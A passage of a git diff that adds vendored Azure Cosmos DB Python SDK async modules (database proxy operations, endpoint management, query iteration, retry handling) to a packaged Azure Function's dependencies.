literalinclude:: ../samples/examples_async.py + :start-after: [START list_containers] + :end-before: [END list_containers] + :language: python + :dedent: 0 + :caption: List all containers in the database: + :name: list_containers + """ + feed_options = _build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + max_item_count = kwargs.pop('max_item_count', None) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + + result = self.client_connection.ReadContainers( + database_link=self.database_link, options=feed_options, **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + return result + + @distributed_trace + def query_containers( + self, + **kwargs: Any + ) -> AsyncItemPaged[Dict[str, Any]]: + """List the properties for containers in the current database. + + :keyword Union[str, Dict[str, Any]] query: The Azure Cosmos DB SQL query to execute. + :keyword parameters: Optional array of parameters to the query. + Each parameter is a dict() with 'name' and 'value' keys. + :paramtype parameters: Optional[List[Dict[str, Any]]] + :keyword int max_item_count: Max number of items to be returned in the enumeration operation. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str, str] initial_headers: Initial headers to be sent as part of the request. + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], AsyncItemPaged[Dict[str, Any]]], None] + :returns: An AsyncItemPaged of container properties (dicts). + :rtype: AsyncItemPaged[Dict[str, Any]] + """ + feed_options = _build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + max_item_count = kwargs.pop('max_item_count', None) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + + parameters = kwargs.pop('parameters', None) + query = kwargs.pop('query', None) + result = self.client_connection.QueryContainers( + database_link=self.database_link, + query=query if parameters is None else dict(query=query, parameters=parameters), + options=feed_options, + **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + return result + + @distributed_trace_async + async def replace_container( + self, + container: Union[str, ContainerProxy, Dict[str, Any]], + partition_key: PartitionKey, + **kwargs: Any + ) -> ContainerProxy: + """Reset the properties of the container. + + Property changes are persisted immediately. Any properties not specified + will be reset to their default values. + + :param container: The ID (name), dict representing the properties or + :class:`ContainerProxy` instance of the container to be replaced. + :type container: Union[str, Dict[str, Any], ~azure.cosmos.aio.ContainerProxy] + :param partition_key: The partition key to use for the container. + :type partition_key: ~azure.cosmos.partition_key.PartitionKey + :keyword dict[str, str] indexing_policy: The indexing policy to apply to the container. + :keyword int default_ttl: Default time to live (TTL) for items in the container. + If unspecified, items do not expire. + :keyword dict[str, str] conflict_resolution_policy: The conflict resolution policy to apply to the container. + :keyword str session_token: Token for use with Session consistency. + :keyword str etag: An ETag value, or the wildcard character (*). 
Used to check if the resource + has changed, and act according to the condition specified by the `match_condition` parameter. + :keyword match_condition: The match condition to use upon the etag. + :paramtype match_condition: ~azure.core.MatchConditions + :keyword dict[str, str] initial_headers: Initial headers to be sent as part of the request. + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], Dict[str, Any]], None] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: Raised if the container couldn't be replaced. + This includes if the container with given id does not exist. + :returns: A `ContainerProxy` instance representing the container after replace completed. + :rtype: ~azure.cosmos.aio.ContainerProxy + + .. admonition:: Example: + + .. literalinclude:: ../samples/examples_async.py + :start-after: [START reset_container_properties] + :end-before: [END reset_container_properties] + :language: python + :dedent: 0 + :caption: Reset the TTL property on a container, and display the updated properties: + :name: reset_container_properties + """ + request_options = _build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + + container_id = self._get_container_id(container) + container_link = self._get_container_link(container_id) + indexing_policy = kwargs.pop('indexing_policy', None) + default_ttl = kwargs.pop('default_ttl', None) + conflict_resolution_policy = kwargs.pop('conflict_resolution_policy', None) + parameters = { + key: value + for key, value in { + "id": container_id, + "partitionKey": partition_key, + "indexingPolicy": indexing_policy, + "defaultTtl": default_ttl, + "conflictResolutionPolicy": conflict_resolution_policy, + }.items() + if value is not None + } + + container_properties = await self.client_connection.ReplaceContainer( + container_link, collection=parameters, options=request_options, **kwargs + ) + + if response_hook: + response_hook(self.client_connection.last_response_headers, container_properties) + + return ContainerProxy( + self.client_connection, self.database_link, container_properties["id"], properties=container_properties + ) + + @distributed_trace_async + async def delete_container( + self, + container: Union[str, ContainerProxy, Dict[str, Any]], + **kwargs: Any + ) -> None: + """Delete a container. + + :param container: The ID (name) of the container to delete. You can either + pass in the ID of the container to delete, a :class:`ContainerProxy` instance or + a dict representing the properties of the container. + :type container: str or Dict[str, Any] or ~azure.cosmos.aio.ContainerProxy + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str, str] initial_headers: Initial headers to be sent as part of the request. + :keyword str etag: An ETag value, or the wildcard character (*). Used to check if the resource + has changed, and act according to the condition specified by the `match_condition` parameter. + :keyword match_condition: The match condition to use upon the etag. + :paramtype match_condition: ~azure.core.MatchConditions + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], None], None] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the container couldn't be deleted. 
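A hedged sketch of calling `delete_container` and handling the documented failure mode; the endpoint, key, and names are placeholders:

    import asyncio
    from azure.cosmos.aio import CosmosClient
    from azure.cosmos.exceptions import CosmosHttpResponseError

    async def main():
        async with CosmosClient(
            "https://<account>.documents.azure.com:443/", credential="<key>"  # placeholders
        ) as client:
            database = client.get_database_client("mydb")  # hypothetical name
            try:
                await database.delete_container("old-container")  # hypothetical name
            except CosmosHttpResponseError as e:
                print("delete failed:", e.status_code)

    asyncio.run(main())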
+        :rtype: None
+        """
+        request_options = _build_options(kwargs)
+        response_hook = kwargs.pop('response_hook', None)
+
+        collection_link = self._get_container_link(container)
+        result = await self.client_connection.DeleteContainer(collection_link, options=request_options, **kwargs)
+        if response_hook:
+            response_hook(self.client_connection.last_response_headers, result)
+
+    @distributed_trace_async
+    async def create_user(self, body: Dict[str, Any], **kwargs: Any) -> UserProxy:  # body should just be id?
+        """Create a new user in the database.
+
+        To update or replace an existing user, use the
+        :func:`DatabaseProxy.upsert_user` method.
+
+        :param Dict[str, Any] body: A dict-like object with an `id` key and value representing the user to be created.
+            The user ID must be unique within the database, and consist of no more than 255 characters.
+        :keyword response_hook: A callable invoked with the response metadata.
+        :paramtype response_hook: Callable[[Dict[str, str], Dict[str, Any]], None]
+        :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the given user couldn't be created.
+        :returns: A `UserProxy` instance representing the new user.
+        :rtype: ~azure.cosmos.aio.UserProxy
+
+        .. admonition:: Example:
+
+            .. literalinclude:: ../samples/examples_async.py
+                :start-after: [START create_user]
+                :end-before: [END create_user]
+                :language: python
+                :dedent: 0
+                :caption: Create a database user:
+                :name: create_user
+        """
+        request_options = _build_options(kwargs)
+        response_hook = kwargs.pop('response_hook', None)
+
+        user = await self.client_connection.CreateUser(
+            database_link=self.database_link, user=body, options=request_options, **kwargs)
+
+        if response_hook:
+            response_hook(self.client_connection.last_response_headers, user)
+
+        return UserProxy(
+            client_connection=self.client_connection, id=user["id"], database_link=self.database_link, properties=user
+        )
+
+    def get_user_client(self, user: Union[str, UserProxy, Dict[str, Any]]) -> UserProxy:
+        """Get a `UserProxy` for a user with specified ID.
+
+        :param user: The ID (name), dict representing the properties, or :class:`UserProxy`
+            instance of the user to get.
+        :type user: Union[str, Dict[str, Any], ~azure.cosmos.aio.UserProxy]
+        :returns: A `UserProxy` instance representing the retrieved user.
+        :rtype: ~azure.cosmos.aio.UserProxy
+        """
+        try:
+            id_value = user.id
+        except AttributeError:
+            try:
+                id_value = user['id']
+            except TypeError:
+                id_value = user
+
+        return UserProxy(client_connection=self.client_connection, id=id_value, database_link=self.database_link)
+
+    @distributed_trace
+    def list_users(self, **kwargs: Any) -> AsyncItemPaged[Dict[str, Any]]:
+        """List all the users in the database.
+
+        :keyword int max_item_count: Max number of users to be returned in the enumeration operation.
+        :keyword response_hook: A callable invoked with the response metadata.
+        :paramtype response_hook: Callable[[Dict[str, str], AsyncItemPaged[Dict[str, Any]]], None]
+        :returns: An AsyncItemPaged of user properties (dicts).
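A brief sketch of the user-management surface (`create_user` plus `list_users`), again with placeholder account values and a hypothetical user id:

    import asyncio
    from azure.cosmos.aio import CosmosClient

    async def main():
        async with CosmosClient(
            "https://<account>.documents.azure.com:443/", credential="<key>"  # placeholders
        ) as client:
            database = client.get_database_client("mydb")  # hypothetical name
            user = await database.create_user({"id": "reporting-user"})  # hypothetical id
            print("created:", user.id)
            async for props in database.list_users():
                print(props["id"])

    asyncio.run(main())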
+        :rtype: AsyncItemPaged[Dict[str, Any]]
+        """
+        feed_options = _build_options(kwargs)
+        response_hook = kwargs.pop('response_hook', None)
+        max_item_count = kwargs.pop('max_item_count', None)
+        if max_item_count is not None:
+            feed_options["maxItemCount"] = max_item_count
+
+        result = self.client_connection.ReadUsers(
+            database_link=self.database_link, options=feed_options, **kwargs
+        )
+        if response_hook:
+            response_hook(self.client_connection.last_response_headers, result)
+        return result
+
+    @distributed_trace
+    def query_users(
+        self,
+        query: Union[str, Dict[str, Any]],
+        **kwargs: Any
+    ) -> AsyncItemPaged[Dict[str, Any]]:
+        """Return all users matching the given `query`.
+
+        :param Union[str, Dict[str, Any]] query: The Azure Cosmos DB SQL query to execute.
+        :keyword parameters: Optional array of parameters to the query.
+            Each parameter is a dict() with 'name' and 'value' keys.
+            Ignored if no query is provided.
+        :paramtype parameters: Optional[List[Dict[str, Any]]]
+        :keyword int max_item_count: Max number of users to be returned in the enumeration operation.
+        :keyword response_hook: A callable invoked with the response metadata.
+        :paramtype response_hook: Callable[[Dict[str, str], AsyncItemPaged[Dict[str, Any]]], None]
+        :returns: An AsyncItemPaged of user properties (dicts).
+        :rtype: AsyncItemPaged[Dict[str, Any]]
+        """
+        feed_options = _build_options(kwargs)
+        response_hook = kwargs.pop('response_hook', None)
+        max_item_count = kwargs.pop('max_item_count', None)
+        if max_item_count is not None:
+            feed_options["maxItemCount"] = max_item_count
+
+        parameters = kwargs.pop('parameters', None)
+        result = self.client_connection.QueryUsers(
+            database_link=self.database_link,
+            query=query if parameters is None else dict(query=query, parameters=parameters),
+            options=feed_options,
+            **kwargs
+        )
+        if response_hook:
+            response_hook(self.client_connection.last_response_headers, result)
+        return result
+
+    @distributed_trace_async
+    async def upsert_user(self, body: Dict[str, Any], **kwargs: Any) -> UserProxy:
+        """Insert or update the specified user.
+
+        If the user already exists in the database, it is replaced. If the user
+        does not already exist, it is inserted.
+
+        :param Dict[str, Any] body: A dict-like object representing the user to update or insert.
+        :keyword response_hook: A callable invoked with the response metadata.
+        :paramtype response_hook: Callable[[Dict[str, str], Dict[str, Any]], None]
+        :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the given user could not be upserted.
+        :returns: A `UserProxy` instance representing the upserted user.
+        :rtype: ~azure.cosmos.aio.UserProxy
+        """
+        request_options = _build_options(kwargs)
+        response_hook = kwargs.pop('response_hook', None)
+
+        user = await self.client_connection.UpsertUser(
+            database_link=self.database_link, user=body, options=request_options, **kwargs
+        )
+
+        if response_hook:
+            response_hook(self.client_connection.last_response_headers, user)
+
+        return UserProxy(
+            client_connection=self.client_connection, id=user["id"], database_link=self.database_link, properties=user
+        )
+
+    @distributed_trace_async
+    async def replace_user(
+        self,
+        user: Union[str, UserProxy, Dict[str, Any]],
+        body: Dict[str, Any],
+        **kwargs: Any
+    ) -> UserProxy:
+        """Replaces the specified user if it exists in the database.
+
+        :param user: The ID (name), dict representing the properties or :class:`UserProxy`
+            instance of the user to be replaced.
+        :type user: Union[str, Dict[str, Any], ~azure.cosmos.aio.UserProxy]
+        :param Dict[str, Any] body: A dict-like object representing the user to replace.
+        :keyword response_hook: A callable invoked with the response metadata.
+        :paramtype response_hook: Callable[[Dict[str, str], Dict[str, Any]], None]
+        :raises ~azure.cosmos.exceptions.CosmosHttpResponseError:
+            If the replace failed or the user with given ID does not exist.
+        :returns: A `UserProxy` instance representing the user after the replace completed.
+        :rtype: ~azure.cosmos.aio.UserProxy
+        """
+        request_options = _build_options(kwargs)
+        response_hook = kwargs.pop('response_hook', None)
+
+        replaced_user: Dict[str, Any] = await self.client_connection.ReplaceUser(
+            user_link=self._get_user_link(user), user=body, options=request_options, **kwargs)
+
+        if response_hook:
+            response_hook(self.client_connection.last_response_headers, replaced_user)
+
+        return UserProxy(
+            client_connection=self.client_connection,
+            id=replaced_user["id"],
+            database_link=self.database_link,
+            properties=replaced_user
+        )
+
+    @distributed_trace_async
+    async def delete_user(self, user: Union[str, UserProxy, Dict[str, Any]], **kwargs: Any) -> None:
+        """Delete the specified user from the database.
+
+        :param user: The ID (name), dict representing the properties or :class:`UserProxy`
+            instance of the user to be deleted.
+        :type user: Union[str, Dict[str, Any], ~azure.cosmos.aio.UserProxy]
+        :keyword response_hook: A callable invoked with the response metadata.
+        :paramtype response_hook: Callable[[Dict[str, str], None], None]
+        :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The user wasn't deleted successfully.
+        :raises ~azure.cosmos.exceptions.CosmosResourceNotFoundError: The user does not exist in the database.
+        :rtype: None
+        """
+        request_options = _build_options(kwargs)
+        response_hook = kwargs.pop('response_hook', None)
+
+        result = await self.client_connection.DeleteUser(
+            user_link=self._get_user_link(user), options=request_options, **kwargs
+        )
+        if response_hook:
+            response_hook(self.client_connection.last_response_headers, result)
+
+    @distributed_trace_async
+    async def get_throughput(self, **kwargs: Any) -> ThroughputProperties:
+        """Get the ThroughputProperties object for this database.
+
+        If no ThroughputProperties already exists for the database, an exception is raised.
+
+        :keyword response_hook: A callable invoked with the response metadata.
+        :paramtype response_hook: Callable[[Dict[str, str], List[Dict[str, Any]]], None]
+        :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: No throughput properties exist for the database
+            or the throughput properties could not be retrieved.
+        :returns: ThroughputProperties for the database.
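Reading and replacing database-level throughput through these methods might look as follows; the account values are placeholders and the RU/s arithmetic is illustrative only:

    import asyncio
    from azure.cosmos.aio import CosmosClient

    async def main():
        async with CosmosClient(
            "https://<account>.documents.azure.com:443/", credential="<key>"  # placeholders
        ) as client:
            database = client.get_database_client("mydb")  # hypothetical name
            throughput = await database.get_throughput()
            print("current RU/s:", throughput.offer_throughput)
            # Bump provisioned throughput by 100 RU/s (illustrative).
            await database.replace_throughput(throughput.offer_throughput + 100)

    asyncio.run(main())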
+ :rtype: ~azure.cosmos.offer.ThroughputProperties + """ + response_hook = kwargs.pop('response_hook', None) + properties = await self._get_properties() + link = properties["_self"] + query_spec = { + "query": "SELECT * FROM root r WHERE r.resource=@link", + "parameters": [{"name": "@link", "value": link}], + } + throughput_properties = [throughput async for throughput in + self.client_connection.QueryOffers(query_spec, **kwargs)] + if len(throughput_properties) == 0: + raise CosmosResourceNotFoundError( + status_code=StatusCodes.NOT_FOUND, + message="Could not find ThroughputProperties for database " + self.database_link) + + if response_hook: + response_hook(self.client_connection.last_response_headers, throughput_properties) + + return ThroughputProperties(offer_throughput=throughput_properties[0]["content"]["offerThroughput"], + properties=throughput_properties[0]) + + + @distributed_trace_async + async def replace_throughput(self, throughput: int, **kwargs: Any) -> ThroughputProperties: + """Replace the database-level throughput. + + If no ThroughputProperties already exist for the database, an exception is raised. + + :param int throughput: The throughput to be set (an integer). + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], Dict[str, Any]], None] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: No throughput properties exist for the database + or the throughput properties could not be updated. + :returns: ThroughputProperties for the database, updated with new throughput. + :rtype: ~azure.cosmos.offer.ThroughputProperties + """ + response_hook = kwargs.pop('response_hook', None) + properties = await self._get_properties() + link = properties["_self"] + query_spec = { + "query": "SELECT * FROM root r WHERE r.resource=@link", + "parameters": [{"name": "@link", "value": link}], + } + throughput_properties = [throughput async for throughput in + self.client_connection.QueryOffers(query_spec, **kwargs)] + if len(throughput_properties) == 0: + raise CosmosResourceNotFoundError( + status_code=StatusCodes.NOT_FOUND, + message="Could not find Offer for database " + self.database_link) + + new_offer = throughput_properties[0].copy() + new_offer["content"]["offerThroughput"] = throughput + data = await self.client_connection.ReplaceOffer(offer_link=throughput_properties[0]["_self"], + offer=throughput_properties[0], **kwargs) + if response_hook: + response_hook(self.client_connection.last_response_headers, data) + return ThroughputProperties(offer_throughput=data["content"]["offerThroughput"], properties=data) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_global_endpoint_manager_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_global_endpoint_manager_async.py new file mode 100644 index 0000000..6ee4b25 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_global_endpoint_manager_async.py @@ -0,0 +1,168 @@ +# The MIT License (MIT) +# Copyright (c) 2021 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, 
and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Internal class for global endpoint manager implementation in the Azure Cosmos +database service. +""" + +import asyncio +from urllib.parse import urlparse +from .. import _constants as constants +from .. import exceptions +from .._location_cache import LocationCache + +# pylint: disable=protected-access + +class _GlobalEndpointManager(object): + """ + This internal class implements the logic for endpoint management for + geo-replicated database accounts. + """ + + def __init__(self, client): + self.client = client + self.EnableEndpointDiscovery = client.connection_policy.EnableEndpointDiscovery + self.PreferredLocations = client.connection_policy.PreferredLocations + self.DefaultEndpoint = client.url_connection + self.refresh_time_interval_in_ms = self.get_refresh_time_interval_in_ms_stub() + self.location_cache = LocationCache( + self.PreferredLocations, + self.DefaultEndpoint, + self.EnableEndpointDiscovery, + client.connection_policy.UseMultipleWriteLocations, + self.refresh_time_interval_in_ms, + ) + self.refresh_needed = False + self.refresh_lock = asyncio.Lock() + self.last_refresh_time = 0 + + def get_refresh_time_interval_in_ms_stub(self): # pylint: disable=no-self-use + return constants._Constants.DefaultUnavailableLocationExpirationTime + + def get_write_endpoint(self): + return self.location_cache.get_write_endpoint() + + def get_read_endpoint(self): + return self.location_cache.get_read_endpoint() + + def resolve_service_endpoint(self, request): + return self.location_cache.resolve_service_endpoint(request) + + def mark_endpoint_unavailable_for_read(self, endpoint): + self.location_cache.mark_endpoint_unavailable_for_read(endpoint) + + def mark_endpoint_unavailable_for_write(self, endpoint): + self.location_cache.mark_endpoint_unavailable_for_write(endpoint) + + def get_ordered_write_endpoints(self): + return self.location_cache.get_ordered_write_endpoints() + + def can_use_multiple_write_locations(self, request): + return self.location_cache.can_use_multiple_write_locations_for_request(request) + + async def force_refresh(self, database_account): + self.refresh_needed = True + await self.refresh_endpoint_list(database_account) + + async def refresh_endpoint_list(self, database_account, **kwargs): + async with self.refresh_lock: + # if refresh is not needed or refresh is already taking place, return + if not self.refresh_needed: + return + try: + await self._refresh_endpoint_list_private(database_account, **kwargs) + except Exception as e: + raise e + + async def _refresh_endpoint_list_private(self, database_account=None, **kwargs): + if database_account: + self.location_cache.perform_on_database_account_read(database_account) + self.refresh_needed = False + + if ( + self.location_cache.should_refresh_endpoints() + and self.location_cache.current_time_millis() 
- self.last_refresh_time > self.refresh_time_interval_in_ms
+        ):
+            if not database_account:
+                database_account = await self._GetDatabaseAccount(**kwargs)
+                self.location_cache.perform_on_database_account_read(database_account)
+                self.last_refresh_time = self.location_cache.current_time_millis()
+                self.refresh_needed = False
+
+    async def _GetDatabaseAccount(self, **kwargs):
+        """Gets the database account.
+
+        First tries the default endpoint; if that fails, tries the endpoints
+        for the preferred locations, in the order they are specified, to get
+        the database account.
+        """
+        try:
+            database_account = await self._GetDatabaseAccountStub(self.DefaultEndpoint, **kwargs)
+            return database_account
+        # If for any (non-globaldb-related) reason we are not able to get the database
+        # account from the above call to GetDatabaseAccount, we try to get this
+        # information from each of the preferred locations that the user might have
+        # specified (by creating a locational endpoint), swallowing the exception
+        # until we get the database account; we return None at the end if we are not
+        # able to get that info from any of the endpoints.
+        except exceptions.CosmosHttpResponseError:
+            for location_name in self.PreferredLocations:
+                locational_endpoint = _GlobalEndpointManager.GetLocationalEndpoint(self.DefaultEndpoint, location_name)
+                try:
+                    database_account = await self._GetDatabaseAccountStub(locational_endpoint, **kwargs)
+                    return database_account
+                except exceptions.CosmosHttpResponseError:
+                    pass
+
+            return None
+
+    async def _GetDatabaseAccountStub(self, endpoint, **kwargs):
+        """Stub for getting the database account from the client.
+
+        This can also be used for mocking purposes.
+        """
+        return await self.client.GetDatabaseAccount(endpoint, **kwargs)
+
+    @staticmethod
+    def GetLocationalEndpoint(default_endpoint, location_name):
+        # For a default_endpoint like 'https://contoso.documents.azure.com:443/', parse it to
+        # generate the URL format. This default_endpoint should be a global endpoint (and
+        # cannot be a locational endpoint); we agreed to document that.
+        endpoint_url = urlparse(default_endpoint)
+
+        # The hostname attribute of endpoint_url will return 'contoso.documents.azure.com'
+        if endpoint_url.hostname is not None:
+            hostname_parts = str(endpoint_url.hostname).lower().split(".")
+            if hostname_parts is not None:
+                # global_database_account_name will be 'contoso'
+                global_database_account_name = hostname_parts[0]
+
+                # Prepare the locational_database_account_name as contoso-EastUS for location_name 'East US'
+                locational_database_account_name = global_database_account_name + "-" + location_name.replace(" ", "")
+
+                # Replace 'contoso' with 'contoso-EastUS' and return the locational_endpoint
+                # as https://contoso-EastUS.documents.azure.com:443/
+                locational_endpoint = default_endpoint.lower().replace(
+                    global_database_account_name, locational_database_account_name, 1
+                )
+                return locational_endpoint
+
+        return None
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_query_iterable_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_query_iterable_async.py
new file mode 100644
index 0000000..bac5c44
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_query_iterable_async.py
@@ -0,0 +1,105 @@
+# The MIT License (MIT)
+# Copyright (c) 2021 Microsoft Corporation
+
+# Permission is hereby granted, free of charge, to any person obtaining a copy
+# of this software and associated documentation files (the "Software"), to deal
+# in the Software without restriction, including without limitation the rights
+# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+# copies of the Software, and to permit persons to whom the Software is
+# furnished to do so, subject to the following conditions:
+
+# The above copyright notice and this permission notice shall be included in all
+# copies or substantial portions of the Software.
+
+# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+# SOFTWARE.
+
+"""Iterable query results in the Azure Cosmos database service.
+"""
+import asyncio
+from azure.core.async_paging import AsyncPageIterator
+from azure.cosmos._execution_context.aio import execution_dispatcher
+
+# pylint: disable=protected-access
+
+
+class QueryIterable(AsyncPageIterator):
+    """Represents an iterable object of the query results.
+
+    QueryIterable is a wrapper for query execution context.
+    """
+
+    def __init__(
+        self,
+        client,
+        query,
+        options,
+        fetch_function=None,
+        collection_link=None,
+        database_link=None,
+        partition_key=None,
+        continuation_token=None,
+    ):
+        """Instantiates a QueryIterable for non-client side partitioning queries.
+
+        _ProxyQueryExecutionContext will be used as the internal query execution
+        context.
+
+        :param CosmosClient client: Instance of document client.
+        :param (str or dict) query: The Azure Cosmos DB SQL query to execute.
+        :param dict options: The request options for the request.
+ :param method fetch_function: + :param method resource_type: The type of the resource being queried + :param str resource_link: If this is a Document query/feed collection_link is required. + + Example of `fetch_function`: + + >>> def result_fn(result): + >>> return result['Databases'] + + """ + self._client = client + self.retry_options = client.connection_policy.RetryOptions + self._query = query + self._options = options + if continuation_token: + options['continuation'] = continuation_token + self._fetch_function = fetch_function + self._collection_link = collection_link + self._database_link = database_link + self._partition_key = partition_key + self._ex_context = execution_dispatcher._ProxyQueryExecutionContext( + self._client, self._collection_link, self._query, self._options, self._fetch_function + ) + super(QueryIterable, self).__init__(self._fetch_next, self._unpack, continuation_token=continuation_token) + + async def _unpack(self, block): + continuation = None + if self._client.last_response_headers: + continuation = self._client.last_response_headers.get("x-ms-continuation") or \ + self._client.last_response_headers.get('etag') + if block: + self._did_a_call_already = False + return continuation, block + + async def _fetch_next(self, *args): # pylint: disable=unused-argument + """Return a block of results with respecting retry policy. + + This method only exists for backward compatibility reasons. (Because + QueryIterable has exposed fetch_next_block api). + + :return: List of results. + :rtype: list + """ + + if 'partitionKey' in self._options and asyncio.iscoroutine(self._options['partitionKey']): + self._options['partitionKey'] = await self._options['partitionKey'] + block = await self._ex_context.fetch_next_block() + if not block: + raise StopAsyncIteration + return block diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_retry_utility_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_retry_utility_async.py new file mode 100644 index 0000000..90bba2f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_retry_utility_async.py @@ -0,0 +1,201 @@ +# The MIT License (MIT) +# Copyright (c) 2021 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Internal methods for executing functions in the Azure Cosmos database service. 
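+
+As a rough, self-contained illustration of the pattern implemented below (a
+sketch only -- the name ``call_with_budget`` is not part of this module), each
+retry attempt is timed and charged against the caller's absolute timeout
+budget:
+
+    import asyncio
+    import time
+
+    async def call_with_budget(func, timeout_s, delay_s=0.5):
+        # Retry ``func`` until it succeeds or the absolute budget runs out.
+        remaining = timeout_s
+        while True:
+            start = time.time()
+            try:
+                return await func()
+            except Exception:
+                await asyncio.sleep(delay_s)
+                remaining -= time.time() - start
+                if remaining <= 0:
+                    raise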
+""" + +import time +import asyncio + +from azure.core.exceptions import AzureError, ClientAuthenticationError +from azure.core.pipeline.policies import AsyncRetryPolicy + +from .. import exceptions +from ..http_constants import HttpHeaders, StatusCodes, SubStatusCodes +from .._retry_utility import _configure_timeout +from .. import _endpoint_discovery_retry_policy +from .. import _resource_throttle_retry_policy +from .. import _default_retry_policy +from .. import _session_retry_policy +from .. import _gone_retry_policy + + +# pylint: disable=protected-access + + +async def ExecuteAsync(client, global_endpoint_manager, function, *args, **kwargs): + """Executes the function with passed parameters applying all retry policies + + :param object client: + Document client instance + :param object global_endpoint_manager: + Instance of _GlobalEndpointManager class + :param function function: + Function to be called wrapped with retries + :param (non-keyworded, variable number of arguments list) *args: + :param (keyworded, variable number of arguments list) **kwargs: + + """ + # instantiate all retry policies here to be applied for each request execution + endpointDiscovery_retry_policy = _endpoint_discovery_retry_policy.EndpointDiscoveryRetryPolicy( + client.connection_policy, global_endpoint_manager, *args + ) + + resourceThrottle_retry_policy = _resource_throttle_retry_policy.ResourceThrottleRetryPolicy( + client.connection_policy.RetryOptions.MaxRetryAttemptCount, + client.connection_policy.RetryOptions.FixedRetryIntervalInMilliseconds, + client.connection_policy.RetryOptions.MaxWaitTimeInSeconds, + ) + defaultRetry_policy = _default_retry_policy.DefaultRetryPolicy(*args) + + sessionRetry_policy = _session_retry_policy._SessionRetryPolicy( + client.connection_policy.EnableEndpointDiscovery, global_endpoint_manager, *args + ) + partition_key_range_gone_retry_policy = _gone_retry_policy.PartitionKeyRangeGoneRetryPolicy(client, *args) + + while True: + try: + client_timeout = kwargs.get('timeout') + start_time = time.time() + if args: + result = await ExecuteFunctionAsync(function, global_endpoint_manager, *args, **kwargs) + else: + result = await ExecuteFunctionAsync(function, *args, **kwargs) + if not client.last_response_headers: + client.last_response_headers = {} + + # setting the throttle related response headers before returning the result + client.last_response_headers[ + HttpHeaders.ThrottleRetryCount + ] = 